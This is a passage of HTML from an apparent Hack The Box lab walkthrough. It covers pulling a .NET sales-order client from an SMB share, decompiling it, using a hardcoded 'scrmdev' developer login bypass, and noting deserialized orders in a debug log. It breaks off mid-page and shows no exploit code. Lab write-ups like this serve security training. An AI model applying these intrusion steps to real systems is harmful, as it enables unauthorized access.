/static/9a5ced4d79ff5729b182c892bf8f9885/39600/netexec-list-shares-miscsvc.png 700w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The share contained an EXE and DLL:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 578px; " > <a class="gatsby-resp-image-link" href="/static/35229230363bcf16a5b99e3e89eb4a15/56022/IT-share.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 30.37974683544304%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABIElEQVR42mWRXXKDMAyEc5WE3+KAjY0xEAiEFNKZdtr7n2a7dqYPbR80llfSZ0k+VJmFTAxMXMPkGo1yqPQNpn1F3dzQuC34ur1D8S7NynNFbe84qyvi3P2yQ0xgUY0hWFQT0mLAWU4QXpMz7Rru+Zm6mkKuoJaJAafU/geeYo2CyZLAioWF6FHVM4H0ywv9BaV6QkvqL9QE/Yx5f2EB6PoNpRxxjDTitMGJ40c0P2rbPaA5WlEyHptQ4HU/ruEZcbpjYkOnUdY+gcau8OZhad5C6QXj9R39+AbrdkzLJ2y386EGCQvm9Qvj/IELbWCe7bYQ93sPQD+uKAckfO0H6PodsuZOqdfmFvYY+X2xC2V8A/fQuRseoWPNT8tER2CLb2SjvqGN2QLHAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="IT share" title="" src="/static/35229230363bcf16a5b99e3e89eb4a15/56022/IT-share.png" srcset="/static/35229230363bcf16a5b99e3e89eb4a15/dda05/IT-share.png 158w, /static/35229230363bcf16a5b99e3e89eb4a15/679a3/IT-share.png 315w, /static/35229230363bcf16a5b99e3e89eb4a15/56022/IT-share.png 578w" sizes="(max-width: 578px) 100vw, 578px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Using <code class="language-text">netexec</code>, I downloaded both files:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/cd6bb13bf3608a989770ea2e4370f9f7/ad007/download-EXE-DLL.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 61.39240506329114%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACVElEQVR42i1SV5LkIAz1VXZSBwewMcYRHNqdJm/1TNXc/yBvH+x8qAQyll5QtClGbNpP7LsviOaC1l2xXm8h7PGD+QvD4Q0b0UHoEblZoNoj8mbFrrBIy5Ex4YnfHxjRrlyR6AlZ0cMYB1U55hFlaSGLFqXuUdcWilkby6YTavsM05+guyNUc0DJiJXFphgQif4LuT5AqBENH9bDBYqIJCMdTkjqC5LlB2L+RmpOuEsGbHMPwEHqGSlzSqSS6PdZg6iw3zD2JRTT30eiWpAx7+SAnRh4Xlg7IMkd7tMOCSlKUs2UQxHYWYKakOY9oswjrAndHNCNryFaIi0bX1tRdWe45R12fkdF7RLNKA/Iq5l6+ryE5rJ02KdEmFZXqHqFZgPDn3V7QskBPqrfs2/cuhd+v6DoWOv5jv8oGrRNGlLtEQuLbUYNN7LH1tBFc8Neragp9rR+YjndiOwj5IbNHuOGlG3QLmVOpA21TdKHuOf5gRE9UeAnUhCE3dYTKro8tAsaM0PT6a6ZYbsJSnXQ1cTmb3DzJ4bpnWzOZHCGqGkeNY8JLkrqv5xMgXnxGnmahb1CcB9Tvw7ULHU3SMd35YK7PV2WE0TBIeZIY+i08nqubOjosvsJUyWdK+hk6bWhRpKNYy59zGGyfUbOEGTymJE2f1Z8W+g1IMx9JtqMAyMxfHM5z2xGmsM1OGzYTHuHaZQ3y9J5S4q5mvAn5noRtW/oEarqGBoWPMdcq/8u81L9uuwRVpzWDM/h7lH7ez++0bArpN8I1gXRp0QfCxeo7pm9y/8AAhWRbiZ8a60AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="download EXE and DLL" title="" src="/static/cd6bb13bf3608a989770ea2e4370f9f7/50637/download-EXE-DLL.png" srcset="/static/cd6bb13bf3608a989770ea2e4370f9f7/dda05/download-EXE-DLL.png 158w, /static/cd6bb13bf3608a989770ea2e4370f9f7/679a3/download-EXE-DLL.png 315w, /static/cd6bb13bf3608a989770ea2e4370f9f7/50637/download-EXE-DLL.png 630w, /static/cd6bb13bf3608a989770ea2e4370f9f7/ad007/download-EXE-DLL.png 681w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">ScrambleClient.exe</code> and <code class="language-text">ScrambleLib.dll</code> were .NET executables:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/19deb261035104f3edefb94f15078b97/921db/file-EXE-DLL.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 23.417721518987342%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABBUlEQVR42nWQ6U7DMBCE8yyQ5naco7kdu2miNE1V2oJAII73f4thbSTEH358mvGs19q15VY3pOoD1f4Z4+EJl+sXlvUVu+kGOTxATVcEXGLj13DDBk7QGO/42pMGLZ0pI7WpZpXdgrqdIeQJVbsYinpGnO4QZwosVaQ78HxAVk6GZDtSNvxmUaLre8T5CMvlE2w2YRNJapYo6bGsGFE2B+R0uWhmODTZnVPg3q2I8l9sr4aV9o9Q8zum9Q3z8QXnyyeEOqMRK9r+BL0B3w4IaW1NlCgzmZ5Qe53pbbT3mYAl+hWiP4KxDkHUwQtb+H9U/1vIBYKYYFp7apaGkPcm+/ESXtThG0/Bo6hhO97GAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="file EXE and DLL" title="" src="/static/19deb261035104f3edefb94f15078b97/50637/file-EXE-DLL.png" srcset="/static/19deb261035104f3edefb94f15078b97/dda05/file-EXE-DLL.png 158w, /static/19deb261035104f3edefb94f15078b97/679a3/file-EXE-DLL.png 315w, /static/19deb261035104f3edefb94f15078b97/50637/file-EXE-DLL.png 630w, /static/19deb261035104f3edefb94f15078b97/921db/file-EXE-DLL.png 684w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I started up a Windows VM and transferred the files over.</p> <p>Running <code class="language-text">ScrambleClient.exe</code> brought up the sales orders app mentioned on the internal company website:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 284px; " > <a class="gatsby-resp-image-link" href="/static/cf0f22532b63fce139d755e1080ae996/6a62f/sales-order-client-sign-in-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 132.27848101265823%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAaCAYAAAC3g3x9AAAACXBIWXMAAAsTAAALEwEAmpwYAAADtElEQVR42pVVaW/bRhDVXw76E/KhvyGxiwJFgaJBUaCIgAABCh9FotgSSZG6YEkWdYuHqIO6bNnyy7yRqMqOgyQEBsvd2X0z++bYVN4poj8YYDgcwvM8/Q+CAL7vYzKZIpRxMPCwWCwwn89Vbm5udL5cLnF7e6trnFerVaQabguz+UIVq+VKN9/d3e3Ge6zXsr5aYbPZ4OHhQWWzedD5/f29juv1GvwajQZSQeDL4ZVaocVRFKmn0TASD8fo9fsIwwCj0Vg9b7ru/j/xeDabqRPlchmpvhxYLJaI41i9ql1VcHR0jKPXr3Fydo7023/wy6tX+PPNX/iQ+YQ/fv8Nx8e/Iv3uHZbiOcEo9PIAcKGAiXIymWA8HmMqHHI+lXmij+PpVjed7vdTR8pKpdLzgLPZ/1ehjEYjdDodjGXU9QPdF4C9Xk830SIVh8LNYRgq2el0GtxL40/3ck66isXi1wGTK7XbHfx7eoafX77Ex7NTrORgQsGzgN1ud88bFYlsg7TCIIjw5u80fnrxAkY2K+Tf7UES4VmmVqFQ+BKQIzlst1zkbVuStQbu8STh3WYL9Xod/f7gEegjQJJNJSNHxRY4lkNdOAUHpmFoOhQcBx8zGQUkDQlQkhHM4QPArTKxOlYvZ2p1tVrqZhXJ1zlLcCYBm06eB2RQavUqDNOAmc1J6Cso2A5yWQOOY8MyLSG7gIvMBT6JGJcXOLXa+K/kI5ZKGgkY04rRd+QW6qHvB9ocWIZU0iqbQ7/fw0D4In/dTldLciB52/WG6HhSmgI2fgrYbrd1wbbyKBVLwpmpXvlSq7EEZ0KuhNOYgWMQDoJBaiisbZavLUHcAoqVek2iKd4yiRsNV70J6bUk9reExhfLHWCr1dIr2vk8DPHOzttwRBFIt2EH+ZawhWlhxLPHgGxLboPSwPX1tfIaRaPvkiAINXfz4lSqKYCRXC17eQlTFixLOLRs2fhjHpLnLWCzKZGaaJtnM+UTQO/CcKiW2Rx03P0n80PhfnpoWRZSrttQt4fiUTRKrhGpeIG8M2GEIJIOPRzrP9cSfSI0zqIwTVPeFOGMOci8Y1unhCLdgQ/zqoWcU8ZJJosPho1c8QrZSmu/L5HtgzaRoBpfB+x5PuxqB5aAvH1/grMLE7nClRjp/DhgIn1PxBeOdlflP9fUqHDJc1tOA010vTKDwkpJNjyVSMdQJdrNyRtbWrPpytPQBYvDE4cUkPXnSg6yLTH/vkd4q0qlrIlclHekXC6hJpV2fn6Oz555h+MwW6OEAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="sales order client login" title="" src="/static/cf0f22532b63fce139d755e1080ae996/6a62f/sales-order-client-sign-in-page.png" srcset="/static/cf0f22532b63fce139d755e1080ae996/dda05/sales-order-client-sign-in-page.png 158w, /static/cf0f22532b63fce139d755e1080ae996/6a62f/sales-order-client-sign-in-page.png 284w" sizes="(max-width: 284px) 100vw, 284px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>On the options window, I set the server to <code class="language-text">dc1.scrm.local</code> and enabled debug logging:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 366px; " > <a class="gatsby-resp-image-link" href="/static/d508b342ae8921c3072e0287a1463104/6cd33/sales-order-client-options.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 60.12658227848101%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABx0lEQVR42o2SWW+bQBSF+f//xZKlPsRRFZdGtdu6TgATUwMGmwDDvnjDq3x6Z7ooUlXchw9mEPfc5Vxp8PgR1mwGRVHheR52u91NqqrCZrMRrFYrbLdbpGkKVVUhsYjhfDphvz/gfD7hcrnQ+9zKif5/e+Zcr1eYpgkp8F/R6/Vwd9eDLMtgUULie5F9vV7/F3Vd43g8Qtd1qpCF+G4YMGcm5vM5GIsQxxGyLKOfSXRzG9724XDAhAuGYSiELMuG4zpwXRfGdArHcYVgXa9uUlU1GupKm0yo5YAEbRszMsanMwsCLJYeCToIAyZm2zT7VoRg00DTSND3fSHo+wEJBFiS0zVVFicJiqL8M6M2iqIQ7quaBumVBC3TorYd2OQSbz2OE7CQiQRRFImANvI8Fyby1ROCNs3QIGNeaKi6/iL2iZc/+jqCSQmKskTOA3+RkcDbO99Bbs6zokByFwsRkBX530FESm4nFMDJslR841XxLeD8vvMKx+PxzxnyOZQk+i94wqoqYfspJuYC37QpjGUExwto3Qw8PT2LkQ2HQ0j8wVtUqNw2VFWB/HmMe3mAd/d9vP80wuPgCz70H9DtdvHQ76PT6eAH91B3oi4HaCMAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="sales order client options" title="" src="/static/d508b342ae8921c3072e0287a1463104/6cd33/sales-order-client-options.png" srcset="/static/d508b342ae8921c3072e0287a1463104/dda05/sales-order-client-options.png 158w, /static/d508b342ae8921c3072e0287a1463104/679a3/sales-order-client-options.png 315w, /static/d508b342ae8921c3072e0287a1463104/6cd33/sales-order-client-options.png 366w" sizes="(max-width: 366px) 100vw, 366px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After connecting to the HTB VPN from the Windows VM and adding <code class="language-text">dc1.scrm.local</code> to the <code class="language-text">hosts</code> file, I tried to login using all of the credentials I already had, but none of them worked:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 292px; " > <a class="gatsby-resp-image-link" href="/static/73e913859bc1838a5a814ccd62c9e7e2/dbefc/invalid-credentials.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 50.632911392405056%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABRUlEQVR42pWSa0+DMBiF+Vn+Yz/6D/ywZBI3FByUMQFlXAZjXFrYYmIox1KzLXHZxSYnTZu3T0/fHkV/1TG3LFiWDWduQ381YOgGbGKjpgyMXRalFE3TIMsyqKoKJYkT1FWFSojRGkVRohSqygq873Hr4JzDcRwodV3Ljf7P4WF9q7quk2d83z8CWZMJR50s4LyXN14a0sDgocehVgIp3YF/r/B4f4dmTZClBd5ED93FOz48H7ZpgcwI4lUCb+HCnFlwXReLuYNPATBedPii7ghkLb52OSL7AawI9tefd3WmfydPPukh/vchB2AURdhuW9C6FDH4jcAltW0rE5HnOTabjZwHDcYMw9gDtzJT12B7YJqmIndrhMsl1CdVgAsEQYDxeAyFEIIkSRCGIQb4NcVxDM/zoGma1OR5gulUg2maGI1G+AEidPa7Cf6+uAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="invalid credentials" title="" src="/static/73e913859bc1838a5a814ccd62c9e7e2/dbefc/invalid-credentials.png" srcset="/static/73e913859bc1838a5a814ccd62c9e7e2/dda05/invalid-credentials.png 158w, /static/73e913859bc1838a5a814ccd62c9e7e2/dbefc/invalid-credentials.png 292w" sizes="(max-width: 292px) 100vw, 292px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I looked at the code in ILSpy. The <code class="language-text">ScrambleNetClient</code> class in <code class="language-text">ScrambleLib.dll</code> featured a way to bypass the login using <code class="language-text">scrmdev</code> as the username:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4803dcba972dbe79b6ad8c58cbccdecb/bf337/ScrambleNetClient-Logon.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 72.78481012658227%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACGElEQVR42o1T2ZKbQBDbT1rbwJwwBze+15XK/3+JohnjLbuSdeVB0FCMkNTdH8J22KgAHxyE9gRrFyFUg1J5ONfCWo/NtsJuR/C+zbX4Jz60bFCVGrtCo6w0hNSoKpPrspAZFWspDQp+l1CV6mfCdNFUI2yL2HboYkT0LVVSqanhiJCfW5QyqXZQyr4nLIVBcCOMH7M9WVIV7UkqqQqR8bmpsPks7tiU7wkLf0A3HDBOC/p5Rhz26NoB4xAxDD3rEZ4qpbQZJW1v1ywT+fbpBx8p6KqZYIcvtPsr/HTCtL/gcvuN6+0Xjucb+nHB4XLB4XzG7XbF9XKG8wGq7lC3C53NKHVkvuqu0De06iaE4Yh2PCOOJ/j+hCYu2AmHSt1RCAutLYxpcmOUqmHrkO87Nu/bspGeY7PAj0fUOceIxnUwzFWYgJq5lsw120tWV4t3y69jlAmlaODbI8L8BdfuSdbzByPqMOV6aHtM/UgwGuvez2HKUFNh7xdoHpYmQgnOHTsveE+15gwaQrNO74p1PkvaLlar34TphWE+znQcnwYFt2bHHxTK59ratEVJMRvQMIqGbrxbEZhp/UpoteNg+0wiTQqYW8K5SwqKNacH7msnVjy9f1HIS8Uuq3hE7EbM84gQAnHf4fxhIi/SAfljdi9NqUk4L3uOD1Xmfa5RcxzSMKc9fteEvwjTgaQyZfls47EF/0v0IPwDUMb2zOZUYPMAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ScrambleNetClient Logon" title="" src="/static/4803dcba972dbe79b6ad8c58cbccdecb/50637/ScrambleNetClient-Logon.png" srcset="/static/4803dcba972dbe79b6ad8c58cbccdecb/dda05/ScrambleNetClient-Logon.png 158w, /static/4803dcba972dbe79b6ad8c58cbccdecb/679a3/ScrambleNetClient-Logon.png 315w, /static/4803dcba972dbe79b6ad8c58cbccdecb/50637/ScrambleNetClient-Logon.png 630w, /static/4803dcba972dbe79b6ad8c58cbccdecb/bf337/ScrambleNetClient-Logon.png 725w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 284px; " > <a class="gatsby-resp-image-link" href="/static/ec276c3e0b7427290caad42caf1eb074/6a62f/developer-bypass.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 132.27848101265823%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAaCAYAAAC3g3x9AAAACXBIWXMAAAsTAAALEwEAmpwYAAADsElEQVR42p1VaWsbVxTVXw79CfnQ35DYoVAKpaEUSgRpC6VyIXYaLaORZEWbtVqzajQzkrVYXk7vudJTVTuCUonLW+595513t8lYdhWO42IymcDzPJ0HQQDf8xEnKULfh+t6WCwWmM/nuLm5wXq91jWFc+5z3mg0kLnqDcRogdvbW6yWKzW4u7vbjffYbGR/tcLDwwMeHx/B/4OMXN/f3+u42WzAX6fTQSYQBuv1Sm9eLpeYRpEyjSYRkiTG2HEQhgGm01iZ93u9/ZxnKGRIErVaDRlHDhBoNpspq3bzM05OTnHy+jX+OPsT2Xc/482rV/jh7Y/4cPER33/3LU5Pv0H2/XsshTnBeHYPOB6P9f3cpJKSJAniOEYqPuQ6lbXRz2bpVpeme/tUdHz2UcD5/J+nUKbTKUajEWIZdf9AZxjuAa+vr9WIN1JxKDQOwxDdbhfZbBbm8qe2XDOo1Wr1OKB50nA4wu+5M3z98iXOz3JYiZ+NC44CGr9RYWQbpBXcIMLbn7L46sULFPN5edrdHsQIzzKglUrlOSBH+nA46KFs22i12qCN57ro9Qeaa0z+Q9B/AdLZVDJyVBhgx7nWJxSLJdTrddTE+PziQgFH4gYDZDKCyW8LgR3gVmlu1bmwZn4aWSyk5HYj7QzYM8Dx9RjtThvFUhGlfEFCX0fjcwOXwq5asVG2bNilEqxyBbmKg2LLl6DEmApIvBOmFS8tl8vIDIdDBH6gzSEIfFUmYhRKabmeq03ClWpypRxHbgRHgpQcgD0DHAyGumFbZVzWLlESn1klC55cwgqI+Sw6f2aimujeobC2F4slLMsSQGE4lSd02hJN8We329NE9gUwUX+meiiQBD8mvrxmsdwB9vt9PWQLXUbULtviu6pUhYPOVVf8WUer2dJWxgbwVNjCWBiz2fwQMNG21OtSusrQlbzrizuop1uiaHpUgiDU3N0DRtID858+oSQsLUt8KP6MxK9snqaZfondIcM0naEk2ZDpCbM4TrTNs5k6woz+C8OJ3hyY0cwP1zvxvEAZKiCfxyhPpEOT1fYZkQq7MrsN59u0ClSM3ggvZ7IXi0X5plxdqbEvnwJzgCD0IT86zP4P5+fIF/KoSLKzDI2dEZ5lHAqFwpcBKQRstVpSOVX89usvuPjrowI2m83/B2hA+cEiY645p5hX8JzRsQgUsKdfsene4KkY/5m5EbY0ZshIxpEUBwkV6EP6iKBsS2T7X4SBpC9ZuzUp1/plDS2ptFwuh78BvEWHNPAnoWAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="developer bypass" title="" src="/static/ec276c3e0b7427290caad42caf1eb074/6a62f/developer-bypass.png" srcset="/static/ec276c3e0b7427290caad42caf1eb074/dda05/developer-bypass.png 158w, /static/ec276c3e0b7427290caad42caf1eb074/6a62f/developer-bypass.png 284w" sizes="(max-width: 284px) 100vw, 284px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The login bypass worked and granted access to the application:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/315244b2a3f3c5d5f61526c883245128/5860e/login-sales-order-client.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 72.78481012658227%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAABb0lEQVR42uWT3W6CQBCFef/38A28EO/VemO0qGkaBCFUfpd/BIRyurOEakzTNia96iRfdpfdOZwZWMkwDJiGCdu28WZZcB0X57JEURQ/kuc5sixDEARomgayLEMyTROqqkLTNJxOp09c14Xneb/CcRzxgvF4DGkxn2O9Xgs2mw222y1WqxUYC4WDNE0F5GQgJdLrOo5jdF2H6XQK6WmxgHbQYByPwumBO7V46b1Qn3Bb3sCwpjFJkqtgFIVweP+CgIHxXmjaAT4fh8MkTOUzxj6dUg71jdY0D8NQCIoevqoWnncat53BZxmOpo2cO2rbFp6foq4vPCniQgWADvWlwf7FgLLXUdUN/5g+WJiAQgjGSYmQ07bviNMzsqIWmzwXUXxGWTW4DTrHogKM79G8qi4CIUgl4y7IOnH/7LuganqHXwg+En8oKP83wclkAokudU/7MFXV/2ripsxmMyyXS3GHd7vdQyiKAl3XMRqN8AFE+HnA06zqdAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="login sales order client" title="" src="/static/315244b2a3f3c5d5f61526c883245128/50637/login-sales-order-client.png" srcset="/static/315244b2a3f3c5d5f61526c883245128/dda05/login-sales-order-client.png 158w, /static/315244b2a3f3c5d5f61526c883245128/679a3/login-sales-order-client.png 315w, /static/315244b2a3f3c5d5f61526c883245128/50637/login-sales-order-client.png 630w, /static/315244b2a3f3c5d5f61526c883245128/5860e/login-sales-order-client.png 676w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Upon signing in, two deserialized sales orders were recorded in <code class="language-text">ScrambleDebugLog.txt</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/18296a929c1bdc6cddea428083f4befe/986c4/debug-log.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 66.45569620253164%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACHUlEQVR42lVTWZbiMAzMQSAhJDwYOvtuZw/Q97+RpkqhmekPPSeyXS5VSU4QhFLXtXRtK0VZSp7ncv/6kq7rpCiKPZA7n33xfV+Ox6O4rqsrw/O8X+EE4UUv972VpmmkKiuJolisMfqQMR3WCnu1Rpqmcrlc5Hq9Ia76CIFcz90Bff8s4zjK8/mUx/bQ73GcZJ4nWbdNNsSyLPq9ros8Xy958ezjgf9VemOlt71M04hqSnFOp5NYsJumWYZhwDrJNM8KyPWhgCtizxHkB0zz84L8Ii88ZDqzA7LUfuhRnpERoIOyHPBQjwsz5OglzTLJECw5jhNJklRzaZqoRMxHUSSO550UiMxYLtceoPwmY+7V0K6samlh3L9opO1aaepaCTGXZ7k45yBQBjOYsHQDTaq6kemtZQVD4jhWFmEYQnhXWNUe3i/H+Q3AUAEpOFm1TavuEnB4xwRgnmFrGWvRFa0yp2ZJknzifr/vGhprlOFP2SNWNQi5ZV3UDO7TGLpNAzZ0BN2fp1nN+f5+aekKyPpZrvYjGFDDASZZu5vCR8iIerU489GQK3u3qnWfA+B4AOy6neEwjO8+HD8GjchxT7WtKikxTUVeYKIK/JcKwumq8FgC97WxeZG9NS87feq2sc9QLl/OeAkjmLFlErRIlmqbULeYAdMYqmH4Hj2WSA3IgIdogrX7ONZwnWC32x8J4PThcHgH3T385/JR/gLc6KJqbYyhhQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="debug log" title="" src="/static/18296a929c1bdc6cddea428083f4befe/50637/debug-log.png" srcset="/static/18296a929c1bdc6cddea428083f4befe/dda05/debug-log.png 158w, /static/18296a929c1bdc6cddea428083f4befe/679a3/debug-log.png 315w, /static/18296a929c1bdc6cddea428083f4befe/50637/debug-log.png 630w, /static/18296a929c1bdc6cddea428083f4befe/986c4/debug-log.png 831w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There was a new order tab, so I tested placing an order:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1d795d253f1b63c59db07d3e51e2c4f4/5860e/sales-order-client-new-order.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 72.78481012658227%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAABX0lEQVR42qWTzW6CQBSFef/38A3cKLqxC1qbVDH+RDBWEBGMwPCrqcDp3FFcVqAkXyAszpxz7h3JMAyYhonj8YiDZcF1XGSXC9I0fUmSJIjjGOfzGbfbDb1eD5JpmthsNthut7Bt+4nrujidTrVwHEcc0O12IX28K1BnKmaqCnU6xXw+x+RrAs/znw5ewRhDWZbo9/uQ3kYjrNcaNE3DbrcDVbDf7xGGIaIoqkUQBCiK4i7ouo4QoYhZliHmrq7XKy68x7pQEnpkWYbk+74olU4ouO28KNH0yfNcvAeD4V2Q8DxPxEx4J1HIhMuWgoFwaB0OsPnK6N8mj5CKNWguOKgie0j42KMwAuPQxNpFfgiygIkOyRXxL0GL3w5d10WHYjCctkORSZDxQdDNoIGQM6JoyM+jb1nmgvTRNOKfkasflbs2VBsxHPK1URQF4/EnlsslVqtVKxaLhbhtnU4Hv7VFetXNJzvKAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="sales order client new order" title="" src="/static/1d795d253f1b63c59db07d3e51e2c4f4/50637/sales-order-client-new-order.png" srcset="/static/1d795d253f1b63c59db07d3e51e2c4f4/dda05/sales-order-client-new-order.png 158w, /static/1d795d253f1b63c59db07d3e51e2c4f4/679a3/sales-order-client-new-order.png 315w, /static/1d795d253f1b63c59db07d3e51e2c4f4/50637/sales-order-client-new-order.png 630w, /static/1d795d253f1b63c59db07d3e51e2c4f4/5860e/sales-order-client-new-order.png 676w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The order was uploaded successfully:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 259px; " > <a class="gatsby-resp-image-link" href="/static/d8a0de804928a988ffddab3900d935c4/0cebb/upload-complete.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 56.9620253164557%; position: relative; bottom: 0; left: 0; background-image: 